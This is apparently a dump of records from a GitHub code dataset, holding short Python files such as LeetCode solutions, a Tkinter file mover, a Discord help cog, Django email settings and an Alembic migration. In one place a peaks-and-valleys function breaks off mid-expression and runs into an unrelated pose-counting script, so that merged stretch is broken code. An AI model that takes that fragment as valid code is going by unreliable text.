self.goal_node = node \n self.goal_obj_label = self.node_to_obj[node].type\n self.set_mission(self.goal_obj_label)\n","repo_name":"andreykurenkov/modeling_env_dynamics","sub_path":"memsearch/igridson_env.py","file_name":"igridson_env.py","file_ext":"py","file_size_in_byte":10969,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"14388057108","text":"import urllib.request as urllib\n\n\nprint(\"This is a site connectivity checker program.\")\ninput_url = input(\"Input the url of the site: \")\n \ndef main(url):\n responce = urllib.urlopen(url)\n print(\"The response code is: \", responce.getcode())\n \nmain(input_url)","repo_name":"Tharindu-Dasantha/CS","sub_path":"projects/20_projects/site_connectivity_checker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23459813199","text":"class Solution(object):\n def plusOne(self, digits):\n \"\"\"\n :type digits: List[int]\n :rtype: List[int]\n \"\"\"\n en = 1\n for i in xrange(len(digits)-1, -1, -1):\n temp = digits[i] + en\n if temp < 10:\n digits[i] = temp\n return digits\n else:\n digits[i] = temp - 10\n return [1] + digits\n","repo_name":"ynyeh0221/LeetCode-II","sub_path":"66. Plus One.py","file_name":"66. Plus One.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7767501739","text":"import sys\nfrom Naked.toolshed.shell import execute_js, muterun_js\nimport time\n\nfrom python_utils.IOUtils import *\n\nif os.path.exists(save_file):\n pdf_list = loadProcessingState()\n print(\"loading previous processing state: \")\nelse:\n folder = sys.argv[1]\n\n # safeguarding foldername\n if folder[-1] != '/':\n folder = folder + '/'\n\n pdf_list = os.listdir(folder)\n pdf_list = [folder + pdf for pdf in pdf_list]\n pdf_list = filterBySize(pdf_list)\n pdf_list = list(pdf_list)\n\n saveProcessingState(pdf_list)\n\nprint(\"list of pdfs to process: \")\nprint(pdf_list)\nprint(\"in total: \")\nprint(len(pdf_list))\n\ncmd_head = \"converter.js \"\n\nwhile len(pdf_list) != 0:\n pdf = pdf_list.pop(0)\n\n cmd = cmd_head + pdf\n output = execute_js(cmd)\n print(output)\n\n # save the status after each process\n saveProcessingState(pdf_list)\n\n# remove the state file to complete processing\nos.remove(save_file)\n","repo_name":"homosapien-lcy/turbo_write_app_and_database","sub_path":"pdf-to-text_diy/converterCallerJS.py","file_name":"converterCallerJS.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17744520833","text":"#code by: Bethina Dileep\ndef convert_peeks_valleys(arr):\n n = len(arr)\n for i in range(0,n,2):\n if i>0 and arr[i] 0:\n #此处计算的是右胳膊\n angle = detector.computeAngle(img,12,14,16)\n #线性插值\n per = np.interp(angle,(210,310),(0,100))\n if per == 100:\n if dir == 0:\n count += 0.5\n dir = 1\n if per == 0:\n if dir == 1:\n count += 0.5\n dir = 0\n bgsound.play()\n cv2.putText(img,str(int(count)),(45,450),cv2.FONT_HERSHEY_PLAIN,5,(0,0,222),8)\n cv2.imshow(\"\",img)\n cv2.waitKey(1)\ncap.release()","repo_name":"chu-ci/work","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14439761771","text":"import os\n\n\nEMAIL_BACKEND = \"django_ses.SESBackend\"\n\nUSE_SES_V2 = True\nAWS_SES_ACCESS_KEY_ID = os.environ.get(\"AWS_SES_ACCESS_KEY_ID\")\nAWS_SES_SECRET_ACCESS_KEY = os.environ.get(\"AWS_SES_SECRET_ACCESS_KEY\")\nAWS_SES_REGION_NAME = os.environ.get(\"AWS_SES_REGION_NAME\", \"eu-central-1\")\nAWS_SES_REGION_ENDPOINT = f\"email.{AWS_SES_REGION_NAME}.amazonaws.com\"\nAWS_SES_FROM_EMAIL = os.environ.get(\"AWS_SES_FROM_EMAIL\")\n\n# EMAIL_BACKEND = \"django.core.mail.backends.smtp.EmailBackend\"\n# EMAIL_USE_TLS = True\n# EMAIL_HOST = os.environ.get(\"EMAIL_HOST\")\n# EMAIL_PORT = os.environ.get(\"EMAIL_PORT\")\n# EMAIL_HOST_USER = os.environ.get(\"EMAIL_HOST_USER\")\n# EMAIL_HOST_PASSWORD = os.environ.get(\"EMAIL_HOST_PASSWORD\")\n# DEFAULT_FROM_EMAIL = \"noreply@example.com\"\n","repo_name":"ondrados/django-boilerplate","sub_path":"src/app/settings/components/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23506519579","text":"import sys\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\narr = [x for x in range(n+1)]\ndic = dict()\nfor x in range(n+1):\n dic[x] = [x]\n\nfor _ in range(m):\n t, x, y = map(int, input().split())\n\n if t == 0:\n if x != y and arr[x] != arr[y]:\n temp = dic.pop(arr[y])\n dic[arr[x]] += temp\n for i in temp:\n arr[i] = arr[x]\n else:\n if arr[y] == arr[x]:\n print(\"YES\")\n else:\n print(\"NO\")","repo_name":"nkrang/Algorithm-Study","sub_path":"202111/B-1717/집합의_표현_시간초과.py","file_name":"집합의_표현_시간초과.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11631651768","text":"#!/usr/bin/env python3\n#\n#Application to move files from one directory to another.\n#\n#Run in terminal with :\n#\n# python3 mover.py\n# /.mover.py\n#\n\nimport os\nimport glob\nimport shutil\nimport errno\n\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nfrom sys import platform\nfrom tkinter import *\n\nclass MainWindow(Frame):\n \"\"\"Initilizes the class MainWindow for tkinter GUI.\n\n Args:\n master (str): Defines parent widget if any.\n \"\"\"\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.master = master\n self.__init__window()\n\n # Creates the window for user interaction.\n def __init__window(self):\n \"\"\"Creates the GUI window based on grid system in tkinter.\"\"\"\n self.master.title(\"Mover\")\n self.pack(fill=BOTH, expand=1)\n\n # Get source and destination directory with file extension to move.\n Label(self, text=\"Source:\").grid(row=0)\n Label(self, text=\"Destination:\").grid(row=1)\n Label(self, text=\"Extension:\").grid(row=2)\n\n # Allow user input or browse with button for source/destination location.\n self.entry1 = Entry(self)\n self.entry2 = Entry(self)\n self.entry3 = Entry(self)\n self.entry1.grid(row=0, column=1)\n self.entry2.grid(row=1, column=1)\n self.entry3.grid(row=2, column=1)\n\n #Buttons on GUI.\n browseButton = Button(self, text=\"Browse\", command=self.loadSource)\n browseButton1 = Button(self, text=\"Browse\", command=self.loadDest)\n applyButton = Button(self, text=\"Apply\", command=self.moveFile)\n browseButton.grid(row=0, column=2, padx=5, pady=5)\n browseButton1.grid(row=1, column=2, padx=5, pady=5)\n applyButton.grid(row=3, column=1, padx=5, pady=5)\n\n def exit(self):\n \"\"\"Exits program.\"\"\"\n exit()\n\n def loadSource(self):\n \"\"\"Loads source directory using tkinter filedialog.\"\"\"\n cwd = filedialog.askdirectory()\n self.entry1.delete(0, END)\n self.entry1.insert(0, cwd)\n\n def loadDest(self):\n \"\"\"Loads destination directory using tkinter filedialog.\"\"\"\n dest = filedialog.askdirectory()\n self.entry2.delete(0, END)\n self.entry2.insert(0, dest)\n\n def moveFile(self):\n \"\"\"Move files with the source and destination defined by user.\n \n Raises:\n shutilError: If file already exists in destination folder.\n \"\"\"\n expression = self.entry3.get()\n file_list = []\n\n # Catch exceptions if shutil has errors.\n try:\n for ext in expression.split(\",\"):\n for file in glob.glob(self.entry1.get() + \"/*.\" + ext):\n file_list.append(file)\n file_name = os.path.basename(file)\n if(os.path.exists(self.entry2.get() + \"/\" + file_name)):\n results = self.owConfirm(file_name)\n if(results):\n shutil.copy(file, self.entry2.get())\n os.remove(file)\n else:\n shutil.move(file, self.entry2.get())\n except shutil.Error as err:\n self.errorWindow(err)\n pass\n\n self.listWindow(file_list)\n\n #New window to show all moved files.\n def listWindow(self, files):\n \"\"\"Creates new window that lists all files moved.\n\n Args:\n files (:obj:`list` of :obj:`str`): List of all files moved.\n\n \"\"\"\n list = '\\n'.join(files)\n messagebox.showinfo(\"Moved Files\", list)\n\n def errorWindow(self, text):\n \"\"\"Creates new window that shows description of error.\n\n Args:\n text (str): Description of error occurance.\n\n \"\"\"\n messagebox.showerror(\"Error\", text)\n\n def owConfirm(self, text):\n \"\"\"Window that appear to allow user to decide to overwrite an existing file.\n\n Args:\n text (str): File name.\n\n Returns:\n bool: Return value based on user choice. Yes for true. No for false.\n\n \"\"\"\n return messagebox.askyesno(\"Overwrite File\", text + \"exist in destination directory. Overwrite?\")\n\n#Main\nroot = Tk()\n\nif platform == 'darwin' or platform == 'linux':\n root.geometry(\"350x150\")\nelif platform == 'win32':\n root.geometry(\"250x130\")\n\nroot.resizable(width=False, height=False)\napp = MainWindow(root)\nroot.mainloop()\n","repo_name":"allenlam465/mover","sub_path":"mover.py","file_name":"mover.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8963521553","text":"import asyncio\nimport math\nimport sys\n\nimport discord\nfrom discord.ext import commands\n\nfrom help_def import hyojun_help\n\nsys.path.append(\"../\")\n\n\nclass ManageHelp(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name=\"help\")\n @commands.bot_has_permissions(add_reactions=True, manage_messages=True)\n async def _help(self, ctx):\n \"\"\"ヘルプを送信\"\"\"\n if isinstance(ctx.channel, discord.DMChannel): # dmだったらreturn\n return\n\n def page_setup(page: int) -> discord.Embed:\n \"\"\"ページ数に対応したhelp内容をセット\"\"\"\n help_embed = discord.Embed(title=f\"標準のhelp {page}/{max_page}\", description=\"\")\n for i in range(5):\n n = 5 * page - 5 + i\n try:\n help_embed.add_field(\n name=hyojun_help[n][\"name\"],\n value=f'{hyojun_help[n][\"value\"]}\\n{sen}',\n inline=False)\n except IndexError:\n break\n return help_embed\n\n react_list = [\n \"\\N{DIGIT ONE}\\N{COMBINING ENCLOSING KEYCAP}\", # 1\n \"\\N{DIGIT TWO}\\N{COMBINING ENCLOSING KEYCAP}\", # 2\n \"\\N{DIGIT THREE}\\N{COMBINING ENCLOSING KEYCAP}\", # 3\n \"\\N{DIGIT FOUR}\\N{COMBINING ENCLOSING KEYCAP}\", # 4\n \"\\N{DIGIT FIVE}\\N{COMBINING ENCLOSING KEYCAP}\", # 5\n \"\\N{BLACK LEFT-POINTING TRIANGLE}\", # 戻る\n \"\\N{BLACK RIGHT-POINTING TRIANGLE}\", # 進む\n \"\\N{BLACK SQUARE FOR STOP}\\N{VARIATION SELECTOR-16}\"] # stop\n\n num_list = [\"\\N{DIGIT ONE}\\N{COMBINING ENCLOSING KEYCAP}\",\n \"\\N{DIGIT TWO}\\N{COMBINING ENCLOSING KEYCAP}\",\n \"\\N{DIGIT THREE}\\N{COMBINING ENCLOSING KEYCAP}\",\n \"\\N{DIGIT FOUR}\\N{COMBINING ENCLOSING KEYCAP}\",\n \"\\N{DIGIT FIVE}\\N{COMBINING ENCLOSING KEYCAP}\"]\n\n sen = \"-------\"\n no_img = \"https://cdn.discordapp.com/attachments/688401587823050787/688401606512869376/YhyUGSJ0vEEZnh33jDHaqhYiB6f5erABoMcJu2bdv-mwkS08Syf29Kefr50kdGcpVjADOjNLgzFiZYJ_Nn6FGmmTMSWWAG78cPWG.png\"\n\n help_count = len(hyojun_help) # ヘルプの数を出す\n max_page = math.ceil(help_count / 5) # 5で割って何ページになるか測定.小数点は繰り上げ\n\n page = 1\n msg = await ctx.send(embed=page_setup(page))\n\n for react in react_list:\n await msg.add_reaction(react) # リアクション付与\n\n def check(reaction, user):\n if reaction.message.id != msg.id:\n return False\n elif ctx.author.bot or user != ctx.author:\n return False\n elif str(reaction.emoji) in react_list:\n return reaction, user\n else:\n return False\n\n while not self.bot.is_closed():\n try:\n react, user = await self.bot.wait_for(\"reaction_add\", check=check, timeout=300)\n except asyncio.TimeoutError:\n await ctx.message.clear_reactions()\n break\n else:\n try:\n emoji = str(react.emoji)\n await msg.remove_reaction(emoji, user)\n if emoji in num_list: # 数字のリアクションが付いたら\n embed = page_setup(page)\n num = 5 * page - 5 + react_list.index(emoji)\n embed.add_field(\n name=\"Info\",\n value=hyojun_help[num][\"info\"])\n if hyojun_help[num][\"image\"] == \"None\": # コマンドの画像を追加\n embed.set_image(url=no_img)\n else:\n embed.set_image(url=hyojun_help[num][\"image\"])\n\n await msg.edit(embed=embed)\n\n if emoji == u\"\\u25C0\" or emoji == u\"\\u25B6\": # 進むか戻るリアクションだったら\n if emoji == u\"\\u25C0\": # 戻るリアクションだったら\n if page == 1:\n page = max_page\n else:\n page -= 1\n\n if emoji == u\"\\u25B6\": # 進むリアクションだったら\n if page == max_page:\n page = 1\n else:\n page += 1\n\n await msg.edit(embed=page_setup(page))\n\n if emoji == \"\\N{BLACK SQUARE FOR STOP}\\N{VARIATION SELECTOR-16}\": # 削除のリアクションだったら\n await msg.delete()\n except IndexError:\n await ctx.send(\"範囲外のリアクションが押されました\", delete_after=3.0)\n continue\n\n\ndef setup(bot):\n bot.add_cog(ManageHelp(bot))\n","repo_name":"Budobudou/2rz-bot","sub_path":"cogs/commands/manage_help.py","file_name":"manage_help.py","file_ext":"py","file_size_in_byte":5054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"42845577955","text":"def nomeMes(mes):\n i=0\n lista = ['janeiro', 'fevereiro', 'março', 'abril', 'maio', 'junho', 'julho', 'agosto', 'setembro', 'outubro', 'novembro', 'dezembro']\n while i < len(lista):\n if mes == lista[i]:\n resposta=i+1\n i+=1\n return resposta\nmes=str(input('nome do mês: '))\nprint(nomeMes(mes))\n\n ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_238/ch48_2019_03_22_11_56_31_569271.py","file_name":"ch48_2019_03_22_11_56_31_569271.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72533751094","text":"\nimport random\n\nwhile True:\n \n print('Welcome to the Amazing 8 Ball')\n\n predictions = ['It is certain!', 'As I see it, YES!', 'Most Likely!', 'Ask again later!', 'My reply is NO!']\n\n question = input('Ask me any question your HeART DesirEs...')\n\n random_prediction = random.choice(predictions)\n\n print('Searching my MaGiC GLoBe...')\n\n print(random_prediction)\n\n question = input('Would you like to ask another question?!? yes or no')\n\n valid_yes = ['yes']\n valid_no = ['no']\n valid_choices = valid_yes + valid_no\n\n while question not in valid_choices:\n print(f'You chose an invalid selection: {question}')\n question = input('Ask another question, or type Done to exit')\n\n if question in valid_no:\n print('Goodbye!')\n break\n\n elif question in valid_yes:\n print('Next Question, Please!') ","repo_name":"lisamonique/-PDX-Code-Guild---Python-Fullstack-Solutions-.","sub_path":"Labs/Lab_04_Magic_8_Ball.py","file_name":"Lab_04_Magic_8_Ball.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1659291926","text":"import copy\nimport sys\n\ninput = sys.stdin.readline\n\nMIIS = lambda: map(int, input().split())\n\nN, HP = MIIS()\nskills = {}\n\nfor i in range(N):\n C, D = MIIS()\n skills[i] = (C, D)\n\nans = 10000000\nans_history = ''\n\ndef dfs(seconds: int, HP: int, skill_wait: list, history:str): # history는 디버깅용으로 만들었다.\n global ans, ans_history\n\n # 이미 정답 아니면\n if seconds >= ans:\n return\n\n # 몬스터 처치 했으면\n if HP <= 0:\n # 몬스터 처치하는 데 최소 시간\n ans = seconds\n ans_history = history\n return\n\n\n for i in range(N):\n new_skill_wait = copy.copy(skill_wait)\n tmp = new_skill_wait[i]\n if tmp < 0:\n tmp = 0\n # tmp+1초만큼 이동할 것\n tmp += 1\n\n for j in range(N):\n new_skill_wait[j] -= tmp\n # 스킬 사용하기\n new_skill_wait[i] = skills[i][0]-1\n\n dfs(seconds + tmp, HP - skills[i][1], new_skill_wait, history+f'{seconds}초: 스킬{i} |')\n\n\ndfs(0, HP, [0] * N, '')\nprint(ans)\n","repo_name":"mintropy/algorithm_pulzo","sub_path":"김서인/2111/211111/20008.py","file_name":"20008.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"18404937359","text":"import itertools; import math; import operator; import random; from bisect import *; from collections import deque, defaultdict, Counter, OrderedDict; from functools import reduce, lru_cache; from heapq import *; import unittest; from typing import List;\ndef get_sol(): return Solution()\nclass Solution:\n # https://leetcode.com/problems/maximum-number-of-points-with-cost/discuss/1344908/Python-3-DP-Explanation-with-pictures.\n def maxPoints(self, points: List[List[int]]) -> int:\n m,n=len(points),len(points[0])\n dp=[[-1]*n for _ in range(m)]\n for j in range(n):\n dp[0][j]=points[0][j]\n for i in range(1,m):\n left=[0 for _ in range(n)]\n right=[0 for _ in range(n)]\n for j in range(n):\n if j==0:\n left[j]=dp[i-1][j]\n else:\n left[j]=max(left[j-1]-1,dp[i-1][j])\n for j in reversed(range(n)):\n if j==n-1:\n right[j]=dp[i-1][j]\n else:\n right[j]=max(right[j+1]-1,dp[i-1][j])\n for j in range(n):\n dp[i][j]=points[i][j]+ max(left[j],right[j])\n return max(dp[-1])\n\nclass tester(unittest.TestCase):\n def test_1(self):\n points = [[1,2,3],[1,5,1],[3,1,1]]\n Output= 9\n self.assertEqual(Output,get_sol().maxPoints(points))\n def test_2(self):\n points = [[1,5],[2,3],[4,2]]\n Output= 11\n self.assertEqual(Output,get_sol().maxPoints(points))\n def test_3(self):\n points = [[1,5,7,9]]\n Output= 9\n self.assertEqual(Output,get_sol().maxPoints(points))\n def test_4(self):\n points = [[1],[5],[7],[9]]\n Output= 22\n self.assertEqual(Output,get_sol().maxPoints(points))\n def test_5(self):\n points = [[0,3,0,4,2],[5,4,2,4,1],[5,0,0,5,1],[2,0,1,0,3]]\n Output= 15\n self.assertEqual(Output,get_sol().maxPoints(points))\n # def test_6(self):\n # def test_7(self):","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc1937.py","file_name":"lc1937.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2198257548","text":"#libraries\nimport hashlib #sha256 for content hashing\n\n#own files\nimport packet, constant\n\n#common base class for OutgoingFile and IncomingFile\nclass ProtoFile:\n\t# number, string, number, number\n\tdef __init__(self, file_type, file_name, file_size, time_to_live):\n\t\tself.type = file_type\n\t\tself.name = file_name\n\t\tself.size = file_size\n\t\tself.ttl = time_to_live\n\n\t\tchunks_amount = file_size / packet.FILE_CHUNK_SIZE\n\t\tif file_size % packet.FILE_CHUNK_SIZE > 0: chunks_amount += 1\n\t\tself.chunks = [None] * chunks_amount #array filled with chunks_amount of Nones\n\n\t\tself.path = None #disk file name; will be different from self.name in case there already exists a file named self.name\n\t\tself.handle = None #file handle, for disk i/o\n\t\t\n\t\tself.hash = None #if OutgoingFile, this is the correct hash. if IncomingFile, this is the purported hash from the sender\n\t\t\n\n\t#sha 256 hash of the contents of the file, if all the chunks are present\n\tdef compute_content_hash(self):\n\t\thash_ob = hashlib.sha256()\n\t\tfor chunk in self.chunks:\n\t\t\tassert chunk is not None\n\t\t\thash_ob.update(chunk)\n\n\t\treturn hash_ob.digest()\n\n\n\t#@(hash): , for a common template\n\tdef message(self, string):\n\t\tconstant.time_print(\"@\" + self.name + ' {' + self.hash.encode('hex') + \"}:\\n\\t\" + string)\n\n\n","repo_name":"pyrolitic/telecoms_multicast","sub_path":"proto_file.py","file_name":"proto_file.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3552941720","text":"parrot = \"Norweigian blue\"\n\nletter = input(\"enter a character: \")\n\n# checking to see if a letter is in parrot\nif letter in parrot:\n print(\"{} is in {}\".format(letter, parrot))\nelse:\n print(\"i dont need that letter\")\n\n# here is using not\n\n\nactivity = input(\"What would you like to do today \")\n\n# checking to see if cinema is in the activity variable. this is also case sensitive\nif \"cinema\" not in activity.casefold():\n print(\"But i want to go to the cinema\")\n","repo_name":"Philip-Loeffler/python","sub_path":"SectionFour/in&NotInConditions.py","file_name":"in&NotInConditions.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33044210483","text":"\"\"\"Redo migrations\n\nRevision ID: 10570f725f26\nRevises:\nCreate Date: 2023-05-22 00:30:36.417395\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"10570f725f26\"\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.execute(sa.text('CREATE EXTENSION IF NOT EXISTS \"uuid-ossp\";'))\n op.create_table(\n \"ImageData\",\n sa.Column(\"data\", sa.LargeBinary(), nullable=False),\n sa.Column(\"id\", sa.UUID(), server_default=sa.text(\"uuid_generate_v4()\"), nullable=False),\n sa.Column(\"created_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.Column(\"updated_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.PrimaryKeyConstraint(\"id\"),\n sa.UniqueConstraint(\"id\"),\n )\n op.create_table(\n \"ScrapeData\",\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"barcode\", sa.String(length=255), nullable=False),\n sa.Column(\"url\", sa.String(length=512), nullable=False),\n sa.Column(\"html\", sa.Text(), nullable=False),\n sa.Column(\"created_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.Column(\"updated_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(op.f(\"ix_ScrapeData_barcode\"), \"ScrapeData\", [\"barcode\"], unique=False)\n op.create_table(\n \"ShoppingList\",\n sa.Column(\"owner_user_id\", sa.String(), nullable=False),\n sa.Column(\"list_title\", sa.String(length=255), nullable=False),\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"created_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.Column(\"updated_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(op.f(\"ix_ShoppingList_owner_user_id\"), \"ShoppingList\", [\"owner_user_id\"], unique=False)\n op.create_table(\n \"Product\",\n sa.Column(\"name\", sa.String(length=255), nullable=False),\n sa.Column(\"description\", sa.TEXT(), nullable=True),\n sa.Column(\"manufacturer\", sa.String(length=255), nullable=True),\n sa.Column(\"barcode\", sa.String(length=255), nullable=False),\n sa.Column(\"thumbnail_uuid\", sa.UUID(), nullable=True),\n sa.Column(\"barcode_image_uuid\", sa.UUID(), nullable=True),\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"created_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.Column(\"updated_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.ForeignKeyConstraint(\n [\"barcode_image_uuid\"],\n [\"ImageData.id\"],\n ),\n sa.ForeignKeyConstraint(\n [\"thumbnail_uuid\"],\n [\"ImageData.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(op.f(\"ix_Product_barcode\"), \"Product\", [\"barcode\"], unique=True)\n op.create_table(\n \"ShoppingListItem\",\n sa.Column(\"name\", sa.String(length=255), nullable=False),\n sa.Column(\"list_id\", sa.Integer(), nullable=False),\n sa.Column(\"product_id\", sa.Integer(), nullable=True),\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"created_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.Column(\"updated_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.ForeignKeyConstraint(\n [\"list_id\"],\n [\"ShoppingList.id\"],\n ),\n sa.ForeignKeyConstraint(\n [\"product_id\"],\n [\"Product.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table(\"ShoppingListItem\")\n op.drop_index(op.f(\"ix_Product_barcode\"), table_name=\"Product\")\n op.drop_table(\"Product\")\n op.drop_index(op.f(\"ix_ShoppingList_owner_user_id\"), table_name=\"ShoppingList\")\n op.drop_table(\"ShoppingList\")\n op.drop_index(op.f(\"ix_ScrapeData_barcode\"), table_name=\"ScrapeData\")\n op.drop_table(\"ScrapeData\")\n op.drop_table(\"ImageData\")\n op.execute(sa.text('DROP EXTENSION IF EXISTS \"uuid-ossp\";'))\n # ### end Alembic commands ###\n","repo_name":"Mewelopers/barcode-api","sub_path":"alembic/versions/10570f725f26_redo_migrations.py","file_name":"10570f725f26_redo_migrations.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6889585443","text":"import os\nimport pandas as pd\n\nmerged_cooccur_csv = os.path.join(\n os.getcwd(),\n 'symlinks/exp/multi_sense_cooccur/cooccurrences/merged_cooccur.csv')\n\nprint('Reading csv ...')\ndf = pd.read_csv(merged_cooccur_csv)\n\ndef show_labels():\n labels = ['row_id'] + df.columns.values.tolist()\n print('Column labels: ',labels)\n\ndef usage():\n label_str = \"- To access column names call 'show_labels()'\"\n example_str = \"- Run the following to get co-occurrences for 'leaf' sorted by 'obj_attr': \\n\\tcooccur('leaf','obj_attr') \\n\\t\\tOR\\n\\tdf[df.word1=='leaf'].sort_values(by='obj_attr')\"\n ref_str = \"- Refer to https://pandas.pydata.org/ for more ways of interacting with dataframe 'df'\"\n usage_str = \"- To see usage instructions again call 'usage()'\"\n print('')\n print('-'*100)\n print('Usage:')\n print(label_str)\n print(example_str)\n print(ref_str)\n print(usage_str)\n print('-'*100)\n print('')\n\ndef cooccur(word1,sort_by):\n print(df[df.word1==word1].sort_values(by=sort_by))\n show_labels()\n\nshow_labels()\nusage()\n\nimport pdb; pdb.set_trace()","repo_name":"BigRedT/vico","sub_path":"exp/multi_sense_cooccur/explore_merged_cooccur.py","file_name":"explore_merged_cooccur.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"31685459287","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nfrom scipy.optimize import curve_fit\nfrom Ex2_RK4_variables import T, t_A\nimport h5py\n\ncol_name = ['dt', 'slope', 'intercept']\ndata = [\n pd.read_csv('global_ERR', delimiter=' ', names=col_name)\n]\n\ntitle_prop = {'fontsize': 16}\ntext_prop = {'fontsize': 14}\n\n'''4th power fit'''\nfig = plt.figure(dpi=150)\nROI = (data[0]['dt'] < 0.5)\n\nfor i, datum in enumerate(data):\n plt.plot(datum['dt'][ROI], datum['slope'][ROI], 'bo', label='observation')\n\ndt_list = np.linspace(0,0.5,100)\n\nfunc = lambda x, a: a*x**4\ncurve_fit_res = curve_fit(func, data[0]['dt'][ROI], data[0]['slope'][ROI], p0=[1e-4])\nprint(curve_fit_res)\nplt.plot(dt_list, func(dt_list, *curve_fit_res[0]), 'r--', label=r'$(\\Delta t)^4$ fitting')\n\nplt.xlabel(r'$\\Delta t$ (atomic unit)', text_prop)\nplt.ylabel('slope (fitting result)', text_prop)\n# plt.title('relative global error / T', title_prop)\nplt.title('relative global error / T, close-up', title_prop)\n\nplt.legend()\nplt.tight_layout()\n# plt.savefig('rel_global_error.png')\nplt.savefig('rel_global_error_close-up.png')\n\n'''plot typical data and linear fitting of slopes'''\n\nfileName = 'ERR.h5'\nf = h5py.File(fileName, 'r')\ndata = []\ndata_dt = []\ndata_fit = []\nfor name in f.keys():\n data.append(f[name][:])\n data_dt.append(f[name].attrs['dt'])\n data_fit.append(f[name].attrs['fit'])\nf.close()\n\n\ntitle_prop = {'fontsize': 16}\ntext_prop = {'fontsize': 14}\n\nfig_ERR = plt.figure(dpi=150)\n\nfor i, datum in enumerate(data[:6]):\n t_axis = np.linspace(0, T-data_dt[i], datum.size)\n plt.plot(t_axis, np.poly1d(data_fit[i])(t_axis), 'k--', )\n plt.plot(t_axis, datum, label=r'$\\Delta$t=' + f'{data_dt[i]}')\n\nplt.xlabel(f'time (a.u.) = ({round(t_A, 3)} fs)', text_prop)\nplt.ylabel('relative deviation from exact sol.', text_prop)\nplt.title('error accumulation rate', title_prop)\nplt.legend()\nplt.savefig('RK_slope_fit_typical.png')\n","repo_name":"irimmal/noise-spectrometry","sub_path":"RK4_example/error_plot.py","file_name":"error_plot.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 